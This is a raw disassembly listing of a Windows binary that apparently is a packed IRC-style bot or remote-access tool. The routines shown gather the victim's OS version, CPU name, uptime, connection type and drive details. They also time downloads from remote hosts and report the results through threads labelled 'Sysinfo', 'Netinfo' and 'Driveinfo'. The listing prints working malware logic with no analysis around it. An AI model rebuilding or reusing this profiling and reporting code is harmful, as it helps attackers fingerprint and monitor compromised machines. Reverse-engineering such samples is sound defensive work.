cmp [ebp+var_51C], 4
jnz short loc_40855E
cmp [ebp+var_518], 5Ah
jnz short loc_40855E
mov [ebp+var_48C], offset aMe ; "ME"
jmp short loc_4085B6
; ---------------------------------------------------------------------------
loc_40855E: ; CODE XREF: sub_4083AD+19A�j
; sub_4083AD+1A3�j
cmp [ebp+var_51C], 5
jnz short loc_40857C
cmp [ebp+var_518], 0
jnz short loc_40857C
mov [ebp+var_48C], offset a2000 ; "2000"
jmp short loc_4085B6
; ---------------------------------------------------------------------------
loc_40857C: ; CODE XREF: sub_4083AD+1B8�j
; sub_4083AD+1C1�j
cmp [ebp+var_51C], 5
jnz short loc_40859A
cmp [ebp+var_518], 1
jnz short loc_40859A
mov [ebp+var_48C], offset aXp ; "XP"
jmp short loc_4085B6
; ---------------------------------------------------------------------------
loc_40859A: ; CODE XREF: sub_4083AD+1D6�j
; sub_4083AD+1DF�j
cmp [ebp+var_51C], 5
jnz short loc_4085B6
cmp [ebp+var_518], 2
jnz short loc_4085B6
mov [ebp+var_48C], offset a2003 ; "2003"
loc_4085B6: ; CODE XREF: sub_4083AD:loc_40851D�j
; sub_4083AD+191�j ...
cmp [ebp+var_510], 2
jnz short loc_4085D6
movsx eax, [ebp+var_50C]
test eax, eax
jz short loc_4085D6
lea eax, [ebp+var_50C]
mov [ebp+var_710], eax
loc_4085D6: ; CODE XREF: sub_4083AD+210�j
; sub_4083AD+21B�j
call sub_40435B
test eax, eax
jz short loc_4085EB
mov [ebp+var_744], offset aYes ; "Yes"
jmp short loc_4085F5
; ---------------------------------------------------------------------------
loc_4085EB: ; CODE XREF: sub_4083AD+230�j
mov [ebp+var_744], offset aNo ; "No"
loc_4085F5: ; CODE XREF: sub_4083AD+23C�j
mov eax, [ebp+var_744]
mov [ebp+var_4], eax
and [ebp+var_47C], 0
and [ebp+var_409], 0
xor eax, eax
cpuid
mov [ebp+var_488], ebx
mov [ebp+var_484], edx
mov [ebp+var_480], ecx
lea eax, [ebp+var_488]
mov [ebp+var_6EC], eax
and [ebp+var_70C], 0
lea eax, [ebp+var_70C]
push eax
push 20019h
push 0
push offset aHardwareDescri ; "HARDWARE\\DESCRIPTION\\System\\CentralProc"...
push 80000002h
call ds:dword_417008 ; RegOpenKeyExA
test eax, eax
jnz short loc_4086B3
and [ebp+var_73C], 0
mov [ebp+var_740], 80h
lea eax, [ebp+var_740]
push eax
lea eax, [ebp+var_488]
push eax
lea eax, [ebp+var_73C]
push eax
push 0
push offset aProcessornames ; "ProcessorNameString"
push [ebp+var_70C]
call ds:dword_41700C ; RegQueryValueExA
test eax, eax
jnz short loc_4086A7
push 1
push 1
lea eax, [ebp+var_488]
push eax
call sub_407C2C
add esp, 0Ch
loc_4086A7: ; CODE XREF: sub_4083AD+2E5�j
push [ebp+var_70C]
call ds:dword_417028 ; RegCloseKey
loc_4086B3: ; CODE XREF: sub_4083AD+2A8�j
cmp [ebp+var_6E4], 1
jnz short loc_4086C8
mov [ebp+var_748], offset byte_41DF00
jmp short loc_4086D2
; ---------------------------------------------------------------------------
loc_4086C8: ; CODE XREF: sub_4083AD+30D�j
mov [ebp+var_748], offset dword_4191F4
loc_4086D2: ; CODE XREF: sub_4083AD+319�j
cmp [ebp+var_524], 1
jnz short loc_4086E7
mov [ebp+var_74C], offset byte_41DF00
jmp short loc_4086F1
; ---------------------------------------------------------------------------
loc_4086E7: ; CODE XREF: sub_4083AD+32C�j
mov [ebp+var_74C], offset dword_4191F4
loc_4086F1: ; CODE XREF: sub_4083AD+338�j
cmp [ebp+var_6E8], 1
jnz short loc_408706
mov [ebp+var_750], offset byte_41DF00
jmp short loc_408710
; ---------------------------------------------------------------------------
loc_408706: ; CODE XREF: sub_4083AD+34B�j
mov [ebp+var_750], offset dword_4191F4
loc_408710: ; CODE XREF: sub_4083AD+357�j
lea eax, [ebp+var_708]
push eax
lea eax, [ebp+var_6E0]
push eax
push [ebp+var_748]
push [ebp+var_6E4]
push [ebp+var_74C]
push [ebp+var_524]
push [ebp+var_750]
push [ebp+var_6E8]
push [ebp+var_4]
push [ebp+var_6F0]
push [ebp+var_738]
call sub_40821B
push eax
push [ebp+var_6EC]
push [ebp+var_514]
push [ebp+var_518]
push [ebp+var_51C]
push [ebp+var_710]
push [ebp+var_48C]
push offset dword_419104
push 400h
lea eax, [ebp+var_408]
push eax
call sub_416BAE ; _snprintf
add esp, 54h
lea eax, [ebp+var_408]
push eax
push offset dword_418B64
lea eax, [ebp+var_6C8]
push eax
call sub_40D53F
add esp, 0Ch
push [ebp+var_6CC]
call sub_409763
pop ecx
xor eax, eax
pop edi
pop esi
pop ebx
leave
retn 4
sub_4083AD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4087C4 proc near ; CODE XREF: sub_40A9CF+1B9C�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push 1A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_4087DE
jmp short locret_408806
; ---------------------------------------------------------------------------
loc_4087DE: ; CODE XREF: sub_4087C4+16�j
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_405F67
pop ecx
pop ecx
push offset aSysinfoThread ; "Sysinfo thread"
push 0
push [ebp+var_4]
push offset sub_4083AD
call sub_4095A4
add esp, 10h
locret_408806: ; CODE XREF: sub_4087C4+18�j
leave
retn
sub_4087C4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408808 proc near ; CODE XREF: sub_408887+B�p
; sub_408887+19�p ...
var_2C = dword ptr -2Ch
var_28 = byte ptr -28h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 2Ch
push [ebp+arg_0]
lea eax, [ebp+var_28]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
lea eax, [ebp+var_28]
push eax
call sub_4105FB
pop ecx
call sub_416B64 ; clock
mov [ebp+var_4], eax
push 7D0h
push 0
push offset a80 ; "80"
lea eax, [ebp+var_28]
push eax
call sub_4050EA
add esp, 10h
mov [ebp+var_8], eax
push [ebp+var_8]
call sub_4053B1
pop ecx
cmp [ebp+var_8], 0
jnz short loc_40885F
mov eax, 3E8h
jmp short locret_408885
; ---------------------------------------------------------------------------
loc_40885F: ; CODE XREF: sub_408808+4E�j
call sub_416B64 ; clock
sub eax, [ebp+var_4]
cmp eax, 3E8h
jnb short loc_40887B
call sub_416B64 ; clock
sub eax, [ebp+var_4]
mov [ebp+var_2C], eax
jmp short loc_408882
; ---------------------------------------------------------------------------
loc_40887B: ; CODE XREF: sub_408808+64�j
mov [ebp+var_2C], 3E8h
loc_408882: ; CODE XREF: sub_408808+71�j
mov eax, [ebp+var_2C]
locret_408885: ; CODE XREF: sub_408808+55�j
leave
retn
sub_408808 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408887 proc near ; CODE XREF: sub_408B30+1C2�p
; sub_40CA29+1E9�p ...
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 18h
push offset dword_418F60
call sub_408808
pop ecx
mov [ebp+var_4], eax
push offset dword_418F6C
call sub_408808
pop ecx
mov [ebp+var_8], eax
push offset dword_418F84
call sub_408808
pop ecx
mov [ebp+var_C], eax
push offset dword_418F90
call sub_408808
pop ecx
mov [ebp+var_10], eax
push offset dword_418FA0
call sub_408808
pop ecx
mov [ebp+var_14], eax
push offset dword_418FB0
call sub_408808
pop ecx
mov [ebp+var_18], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
add eax, [ebp+var_C]
add eax, [ebp+var_10]
add eax, [ebp+var_14]
add eax, [ebp+var_18]
xor edx, edx
push 6
pop ecx
div ecx
leave
retn
sub_408887 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4088FC proc near ; CODE XREF: sub_408B30:loc_408D33�p
var_438 = qword ptr -438h
var_430 = dword ptr -430h
var_42C = qword ptr -42Ch
var_424 = dword ptr -424h
var_420 = dword ptr -420h
var_41C = dword ptr -41Ch
var_418 = byte ptr -418h
var_318 = dword ptr -318h
var_314 = dword ptr -314h
var_310 = dword ptr -310h
var_30C = dword ptr -30Ch
var_308 = byte ptr -308h
var_208 = byte ptr -208h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 438h
and [ebp+var_8], 0
jmp short loc_408912
; ---------------------------------------------------------------------------
loc_40890B: ; CODE XREF: sub_4088FC+23�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_408912: ; CODE XREF: sub_4088FC+D�j
mov eax, [ebp+var_8]
cmp ds:off_418FC4[eax*4], 0
jz short loc_408921
jmp short loc_40890B
; ---------------------------------------------------------------------------
loc_408921: ; CODE XREF: sub_4088FC+21�j
mov eax, [ebp+var_8]
shr eax, 1
mov [ebp+var_8], eax
and [ebp+var_4], 0
jmp short loc_408936
; ---------------------------------------------------------------------------
loc_40892F: ; CODE XREF: sub_4088FC+D6�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_408936: ; CODE XREF: sub_4088FC+31�j
cmp [ebp+var_4], 3
jnb loc_408B2C
mov eax, [ebp+var_8]
dec eax
push eax
push 0
call sub_4103F5
pop ecx
pop ecx
mov [ebp+var_318], eax
mov eax, [ebp+var_318]
shl eax, 1
push ds:off_418FC4[eax*4]
lea eax, [ebp+var_418]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
lea eax, [ebp+var_418]
push eax
call sub_4105FB
pop ecx
mov eax, [ebp+var_318]
shl eax, 1
push ds:off_418FC8[eax*4]
lea eax, [ebp+var_308]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
lea eax, [ebp+var_308]
push eax
call sub_4105FB
pop ecx
push 2710h
push 0
push offset a80 ; "80"
lea eax, [ebp+var_418]
push eax
call sub_4050EA
add esp, 10h
mov [ebp+var_310], eax
cmp [ebp+var_310], 0
jnz short loc_4089D7
jmp loc_40892F
; ---------------------------------------------------------------------------
loc_4089D7: ; CODE XREF: sub_4088FC+D4�j
lea eax, [ebp+var_418]
push eax
lea eax, [ebp+var_308]
push eax
push offset aGetSHttp1_0Hos ; "GET /%s HTTP/1.0\r\nHost: %s\r\n\r\n"
push 200h
lea eax, [ebp+var_208]
push eax
call sub_416BAE ; _snprintf
add esp, 14h
lea eax, [ebp+var_208]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_208]
push eax
push [ebp+var_310]
call sub_4053BF
add esp, 0Ch
and [ebp+var_314], 0
call sub_416B64 ; clock
mov [ebp+var_41C], eax
and [ebp+var_30C], 0
loc_408A3A: ; CODE XREF: sub_4088FC+1AF�j
; sub_4088FC+22B�j
push 1388h
push 200h
lea eax, [ebp+var_208]
push eax
push [ebp+var_310]
call sub_405443
add esp, 10h
mov [ebp+var_420], eax
cmp [ebp+var_420], 0
jz short loc_408A93
cmp [ebp+var_420], 0FFFFFFFFh
jz short loc_408A93
call sub_416B64 ; clock
sub eax, [ebp+var_41C]
cmp eax, 1388h
jnb short loc_408A93
cmp [ebp+var_30C], 100000h
jb loc_408B15
loc_408A93: ; CODE XREF: sub_4088FC+16A�j
; sub_4088FC+173�j ...
cmp [ebp+var_30C], 2000h
jnb short loc_408AAD
push [ebp+var_310]
call sub_40538D
pop ecx
jmp short loc_408A3A
; ---------------------------------------------------------------------------
loc_408AAD: ; CODE XREF: sub_4088FC+1A1�j
mov eax, [ebp+var_30C]
mov dword ptr [ebp+var_42C], eax
and dword ptr [ebp+var_42C+4], 0
fild [ebp+var_42C]
fstp [ebp+var_430]
call sub_416B64 ; clock
sub eax, [ebp+var_41C]
mov dword ptr [ebp+var_438], eax
and dword ptr [ebp+var_438+4], 0
fild [ebp+var_438]
fdiv ds:flt_417270
fdivr [ebp+var_430]
call sub_416CF8 ; _ftol
mov [ebp+var_424], eax
push [ebp+var_310]
call sub_40538D
pop ecx
mov eax, [ebp+var_424]
jmp short locret_408B2E
; ---------------------------------------------------------------------------
loc_408B15: ; CODE XREF: sub_4088FC+191�j
mov eax, [ebp+var_30C]
add eax, [ebp+var_420]
mov [ebp+var_30C], eax
jmp loc_408A3A
; ---------------------------------------------------------------------------
loc_408B2C: ; CODE XREF: sub_4088FC+3E�j
xor eax, eax
locret_408B2E: ; CODE XREF: sub_4088FC+217�j
leave
retn
sub_4088FC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408B30 proc near ; DATA XREF: sub_408E4A+35�o
var_A9C = qword ptr -0A9Ch
var_A7C = qword ptr -0A7Ch
var_A74 = dword ptr -0A74h
var_A70 = dword ptr -0A70h
var_A6C = dword ptr -0A6Ch
var_A68 = dword ptr -0A68h
var_A64 = dword ptr -0A64h
var_A60 = dword ptr -0A60h
var_A5C = byte ptr -0A5Ch
var_8B8 = dword ptr -8B8h
var_8B4 = dword ptr -8B4h
var_8B0 = byte ptr -8B0h
var_830 = dword ptr -830h
var_82C = dword ptr -82Ch
var_828 = dword ptr -828h
var_824 = dword ptr -824h
var_820 = dword ptr -820h
var_81C = dword ptr -81Ch
var_818 = dword ptr -818h
var_814 = byte ptr -814h
var_414 = byte ptr -414h
var_10 = byte ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0A7Ch
push 1A7h
push [ebp+arg_0]
lea eax, [ebp+var_A60]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
push offset dword_41F018
lea eax, [ebp+var_414]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
lea eax, [ebp+var_824]
push eax
push 0
push 0
push offset dword_41F018
call ds:dword_41DF54 ; getaddrinfo
test eax, eax
jnz short loc_408BBC
push 1
push 0
push 0
push 401h
lea eax, [ebp+var_414]
push eax
mov eax, [ebp+var_824]
push dword ptr [eax+10h]
mov eax, [ebp+var_824]
push dword ptr [eax+18h]
call ds:dword_41DF58 ; getnameinfo
push [ebp+var_824]
call ds:dword_41DF5C ; freeaddrinfo
loc_408BBC: ; CODE XREF: sub_408B30+54�j
call sub_409318
mov [ebp+var_8B8], eax
mov eax, [ebp+var_8B8]
xor edx, edx
mov ecx, 15180h
div ecx
mov [ebp+var_830], eax
mov eax, [ebp+var_8B8]
xor edx, edx
mov ecx, 15180h
div ecx
mov eax, edx
xor edx, edx
mov ecx, 0E10h
div ecx
mov [ebp+var_820], eax
mov eax, [ebp+var_8B8]
xor edx, edx
mov ecx, 15180h
div ecx
mov eax, edx
xor edx, edx
mov ecx, 0E10h
div ecx
mov eax, edx
xor edx, edx
push 3Ch
pop ecx
div ecx
mov [ebp+var_82C], eax
push offset aUnknown_0 ; "Unknown"
lea eax, [ebp+var_8B0]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
push offset aUnknown_0 ; "Unknown"
lea eax, [ebp+var_10]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
cmp ds:dword_41DF4C, 0
jz short loc_408C9F
push 0
push 80h
lea eax, [ebp+var_8B0]
push eax
lea eax, [ebp+var_818]
push eax
call ds:dword_41DF4C ; InternetGetConnectedStateExA
test eax, eax
jz short loc_408C9F
mov eax, [ebp+var_818]
and eax, 1
test eax, eax
jz short loc_408C8F
push offset aModem ; "Modem"
lea eax, [ebp+var_10]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp short loc_408C9F
; ---------------------------------------------------------------------------
loc_408C8F: ; CODE XREF: sub_408B30+14B�j
push offset aLan ; "LAN"
lea eax, [ebp+var_10]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_408C9F: ; CODE XREF: sub_408B30+11F�j
; sub_408B30+13E�j ...
call sub_4043E9
test eax, eax
jz short loc_408CB4
mov [ebp+var_A64], offset aYes ; "Yes"
jmp short loc_408CBE
; ---------------------------------------------------------------------------
loc_408CB4: ; CODE XREF: sub_408B30+176�j
mov [ebp+var_A64], offset aNo ; "No"
loc_408CBE: ; CODE XREF: sub_408B30+182�j
mov eax, [ebp+var_A64]
mov [ebp+var_8], eax
call sub_404279
test eax, eax
jz short loc_408CDC
mov [ebp+var_A68], offset aYes ; "Yes"
jmp short loc_408CE6
; ---------------------------------------------------------------------------
loc_408CDC: ; CODE XREF: sub_408B30+19E�j
mov [ebp+var_A68], offset aNo ; "No"
loc_408CE6: ; CODE XREF: sub_408B30+1AA�j
mov eax, [ebp+var_A68]
mov [ebp+var_8B4], eax
call sub_408887
mov [ebp+var_828], eax
mov [ebp+var_81C], offset aBad ; "Bad"
cmp [ebp+var_828], 2EEh
jnb short loc_408D1D
mov [ebp+var_81C], offset aAvarage ; "Avarage"
loc_408D1D: ; CODE XREF: sub_408B30+1E1�j
cmp [ebp+var_828], 1F4h
jnb short loc_408D33
mov [ebp+var_81C], offset aGood ; "Good"
loc_408D33: ; CODE XREF: sub_408B30+1F7�j
call sub_4088FC
mov [ebp+var_4], eax
cmp [ebp+var_82C], 1
jnz short loc_408D50
mov [ebp+var_A6C], offset byte_41DF00
jmp short loc_408D5A
; ---------------------------------------------------------------------------
loc_408D50: ; CODE XREF: sub_408B30+212�j
mov [ebp+var_A6C], offset dword_4191F4
loc_408D5A: ; CODE XREF: sub_408B30+21E�j
cmp [ebp+var_820], 1
jnz short loc_408D6F
mov [ebp+var_A70], offset byte_41DF00
jmp short loc_408D79
; ---------------------------------------------------------------------------
loc_408D6F: ; CODE XREF: sub_408B30+231�j
mov [ebp+var_A70], offset dword_4191F4
loc_408D79: ; CODE XREF: sub_408B30+23D�j
cmp [ebp+var_830], 1
jnz short loc_408D8E
mov [ebp+var_A74], offset byte_41DF00
jmp short loc_408D98
; ---------------------------------------------------------------------------
loc_408D8E: ; CODE XREF: sub_408B30+250�j
mov [ebp+var_A74], offset dword_4191F4
loc_408D98: ; CODE XREF: sub_408B30+25C�j
push [ebp+var_A6C]
push [ebp+var_82C]
push [ebp+var_A70]
push [ebp+var_820]
push [ebp+var_A74]
push [ebp+var_830]
mov eax, [ebp+var_4]
mov dword ptr [ebp+var_A7C], eax
and dword ptr [ebp+var_A7C+4], 0
fild [ebp+var_A7C]
fdiv ds:flt_417274
push ecx
push ecx
fstp [esp+0A9Ch+var_A9C]
push [ebp+var_828]
push [ebp+var_81C]
push [ebp+var_8B4]
push [ebp+var_8]
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_8B0]
push eax
lea eax, [ebp+var_414]
push eax
push offset dword_419284
push 400h
lea eax, [ebp+var_814]
push eax
call sub_416BAE ; _snprintf
add esp, 48h
lea eax, [ebp+var_814]
push eax
push offset dword_418B64
lea eax, [ebp+var_A5C]
push eax
call sub_40D53F
add esp, 0Ch
push [ebp+var_A60]
call sub_409763
pop ecx
xor eax, eax
leave
retn 4
sub_408B30 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408E4A proc near ; CODE XREF: sub_40A9CF+1BD8�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push 1A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_408E64
jmp short locret_408E8C
; ---------------------------------------------------------------------------
loc_408E64: ; CODE XREF: sub_408E4A+16�j
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_405F67
pop ecx
pop ecx
push offset aNetinfoThread ; "Netinfo thread"
push 0
push [ebp+var_4]
push offset sub_408B30
call sub_4095A4
add esp, 10h
locret_408E8C: ; CODE XREF: sub_408E4A+18�j
leave
retn
sub_408E4A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408E8E proc near ; CODE XREF: sub_40CA29+1C5�p
; sub_40CA29+2DA�p ...
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
push ebp
mov ebp, esp
sub esp, 24h
mov eax, ds:dword_419398
mov [ebp+var_1C], eax
and [ebp+var_10], 0
and [ebp+var_C], 0
loc_408EA4: ; CODE XREF: sub_408E8E+95�j
lea eax, [ebp+var_1C]
push eax
call ds:dword_4170CC ; GetDriveTypeA
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jz short loc_408F14
cmp [ebp+var_10], 1
jz short loc_408F14
cmp [ebp+var_10], 5
jz short loc_408EE1
cmp [ebp+var_10], 2
jz short loc_408EE1
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_1C]
push eax
call ds:dword_4170C8 ; GetDiskFreeSpaceExA
jmp short loc_408EF1
; ---------------------------------------------------------------------------
loc_408EE1: ; CODE XREF: sub_408E8E+33�j
; sub_408E8E+39�j
push 8
push 0
lea eax, [ebp+var_24]
push eax
call sub_416B6A ; memset
add esp, 0Ch
loc_408EF1: ; CODE XREF: sub_408E8E+51�j
push 0
push 100000h
push [ebp+var_20]
push [ebp+var_24]
call sub_416C90
mov [ebp+var_24], eax
mov [ebp+var_20], edx
mov eax, [ebp+var_24]
mov ecx, [ebp+var_C]
add ecx, eax
mov [ebp+var_C], ecx
loc_408F14: ; CODE XREF: sub_408E8E+27�j
; sub_408E8E+2D�j
mov al, byte ptr [ebp+var_1C]
add al, 1
mov byte ptr [ebp+var_1C], al
movsx eax, byte ptr [ebp+var_1C]
cmp eax, 5Ah
jnz loc_408EA4
mov eax, [ebp+var_C]
leave
retn
sub_408E8E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408F2E proc near ; DATA XREF: sub_4091E2+35�o
var_5DC = dword ptr -5DCh
var_5D8 = dword ptr -5D8h
var_5D4 = dword ptr -5D4h
var_5D0 = byte ptr -5D0h
var_42C = dword ptr -42Ch
var_428 = dword ptr -428h
var_424 = dword ptr -424h
var_420 = byte ptr -420h
var_418 = dword ptr -418h
var_414 = dword ptr -414h
var_410 = dword ptr -410h
var_40C = byte ptr -40Ch
var_404 = byte ptr -404h
var_3EF = byte ptr -3EFh
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 5DCh
push esi
push edi
push 1A7h
push [ebp+arg_0]
lea eax, [ebp+var_5D4]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
push 5
pop ecx
mov esi, offset aDriveInformati ; "Drive information - "
lea edi, [ebp+var_404]
rep movsd
movsb
mov ecx, 0FAh
xor eax, eax
lea edi, [ebp+var_3EF]
rep stosd
stosw
stosb
mov eax, ds:dword_419398
mov [ebp+var_424], eax
and [ebp+var_418], 0
and [ebp+var_5D8], 0
and [ebp+var_414], 0
mov [ebp+var_410], 1
loc_408FA6: ; CODE XREF: sub_408F2E+23B�j
lea eax, [ebp+var_424]
push eax
call ds:dword_4170CC ; GetDriveTypeA
mov [ebp+var_5DC], eax
cmp [ebp+var_5DC], 0
jz loc_409151
cmp [ebp+var_5DC], 1
jz loc_409151
cmp [ebp+var_5DC], 2
jnz short loc_408FE5
mov [ebp+var_4], offset aRemovable ; "removable"
jmp short loc_409034
; ---------------------------------------------------------------------------
loc_408FE5: ; CODE XREF: sub_408F2E+AC�j
cmp [ebp+var_5DC], 3
jnz short loc_408FF7
mov [ebp+var_4], offset aFixed ; "fixed"
jmp short loc_409034
; ---------------------------------------------------------------------------
loc_408FF7: ; CODE XREF: sub_408F2E+BE�j
cmp [ebp+var_5DC], 4
jnz short loc_409009
mov [ebp+var_4], offset aRemote ; "remote"
jmp short loc_409034
; ---------------------------------------------------------------------------
loc_409009: ; CODE XREF: sub_408F2E+D0�j
cmp [ebp+var_5DC], 5
jnz short loc_40901B
mov [ebp+var_4], offset aCdRom ; "cd-rom"
jmp short loc_409034
; ---------------------------------------------------------------------------
loc_40901B: ; CODE XREF: sub_408F2E+E2�j
cmp [ebp+var_5DC], 6
jnz short loc_40902D
mov [ebp+var_4], offset aRamdisk ; "ramdisk"
jmp short loc_409034
; ---------------------------------------------------------------------------
loc_40902D: ; CODE XREF: sub_408F2E+F4�j
mov [ebp+var_4], offset aUnknown ; "unknown"
loc_409034: ; CODE XREF: sub_408F2E+B5�j
; sub_408F2E+C7�j ...
cmp [ebp+var_5DC], 5
jz short loc_40906A
cmp [ebp+var_5DC], 2
jz short loc_40906A
lea eax, [ebp+var_42C]
push eax
lea eax, [ebp+var_420]
push eax
lea eax, [ebp+var_40C]
push eax
lea eax, [ebp+var_424]
push eax
call ds:dword_4170C8 ; GetDiskFreeSpaceExA
jmp short loc_40907D
; ---------------------------------------------------------------------------
loc_40906A: ; CODE XREF: sub_408F2E+10D�j
; sub_408F2E+116�j
push 8
push 0
lea eax, [ebp+var_42C]
push eax
call sub_416B6A ; memset
add esp, 0Ch
loc_40907D: ; CODE XREF: sub_408F2E+13A�j
push 0
push 100000h
push [ebp+var_428]
push [ebp+var_42C]
call sub_416C90
mov [ebp+var_42C], eax
mov [ebp+var_428], edx
cmp [ebp+var_410], 0
jnz short loc_4090BF
push offset dword_419404
lea eax, [ebp+var_404]
push eax
call sub_416B70 ; strcat
pop ecx
pop ecx
jmp short loc_4090C6
; ---------------------------------------------------------------------------
loc_4090BF: ; CODE XREF: sub_408F2E+17A�j
and [ebp+var_410], 0
loc_4090C6: ; CODE XREF: sub_408F2E+18F�j
mov eax, [ebp+var_42C]
or eax, [ebp+var_428]
test eax, eax
jz short loc_40910A
push [ebp+var_428]
push [ebp+var_42C]
push [ebp+var_4]
lea eax, [ebp+var_424]
push eax
lea eax, [ebp+var_404]
push eax
push offset dword_4193E4
lea eax, [ebp+var_404]
push eax
call ds:dword_4171E0 ; wsprintfA
add esp, 1Ch
jmp short loc_409130
; ---------------------------------------------------------------------------
loc_40910A: ; CODE XREF: sub_408F2E+1A6�j
push [ebp+var_4]
lea eax, [ebp+var_424]
push eax
lea eax, [ebp+var_404]
push eax
push offset dword_4193D4
lea eax, [ebp+var_404]
push eax
call ds:dword_4171E0 ; wsprintfA
add esp, 14h
loc_409130: ; CODE XREF: sub_408F2E+1DA�j
mov eax, [ebp+var_42C]
mov ecx, [ebp+var_414]
add ecx, eax
mov [ebp+var_414], ecx
mov eax, [ebp+var_5D8]
inc eax
mov [ebp+var_5D8], eax
loc_409151: ; CODE XREF: sub_408F2E+92�j
; sub_408F2E+9F�j
mov al, byte ptr [ebp+var_424]
add al, 1
mov byte ptr [ebp+var_424], al
movsx eax, byte ptr [ebp+var_424]
cmp eax, 5Ah
jnz loc_408FA6
cmp [ebp+var_5D8], 0
jz short loc_40918B
push offset dword_419404
lea eax, [ebp+var_404]
push eax
call sub_416B70 ; strcat
pop ecx
pop ecx
loc_40918B: ; CODE XREF: sub_408F2E+248�j
push [ebp+var_414]
push [ebp+var_5D8]
lea eax, [ebp+var_404]
push eax
push offset dword_41939C
lea eax, [ebp+var_404]
push eax
call ds:dword_4171E0 ; wsprintfA
add esp, 14h
lea eax, [ebp+var_404]
push eax
push offset dword_418B64
lea eax, [ebp+var_5D0]
push eax
call sub_40D53F
add esp, 0Ch
push [ebp+var_5D4]
call sub_409763
pop ecx
xor eax, eax
pop edi
pop esi
leave
retn 4
sub_408F2E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4091E2 proc near ; CODE XREF: sub_40A9CF+1C61�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push 1A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_4091FC
jmp short locret_409224
; ---------------------------------------------------------------------------
loc_4091FC: ; CODE XREF: sub_4091E2+16�j
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_405F67
pop ecx
pop ecx
push offset aDriveinfoThrea ; "Driveinfo thread"
push 0
push [ebp+var_4]
push offset sub_408F2E
call sub_4095A4
add esp, 10h
locret_409224: ; CODE XREF: sub_4091E2+18�j
leave
retn
sub_4091E2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409226 proc near ; CODE XREF: UPX0:00416A06�p
var_20 = qword ptr -20h
var_18 = qword ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 18h
lea eax, [ebp+var_8]
push eax
call ds:dword_4170D8 ; QueryPerformanceCounter
lea eax, [ebp+var_10]
push eax
call ds:dword_4170D4 ; QueryPerformanceFrequency
cmp [ebp+var_4], 0
jl short loc_40928E
jg short loc_40924E
cmp [ebp+var_8], 0
jbe short loc_40928E
loc_40924E: ; CODE XREF: sub_409226+20�j
cmp [ebp+var_C], 0
jl short loc_40928E
jg short loc_40925C
cmp [ebp+var_10], 0
jbe short loc_40928E
loc_40925C: ; CODE XREF: sub_409226+2E�j
push [ebp+var_C]
push [ebp+var_10]
push [ebp+var_4]
push [ebp+var_8]
call sub_416D10
mov dword ptr [ebp+var_18], eax
mov dword ptr [ebp+var_18+4], edx
fild [ebp+var_18]
push ecx
push ecx
fstp [esp+20h+var_20]
call sub_416CFE ; ceil
pop ecx
pop ecx
call sub_416CF8 ; _ftol
mov ds:dword_41E3A0, eax
jmp short locret_4092A2
; ---------------------------------------------------------------------------
loc_40928E: ; CODE XREF: sub_409226+1E�j
; sub_409226+26�j ...
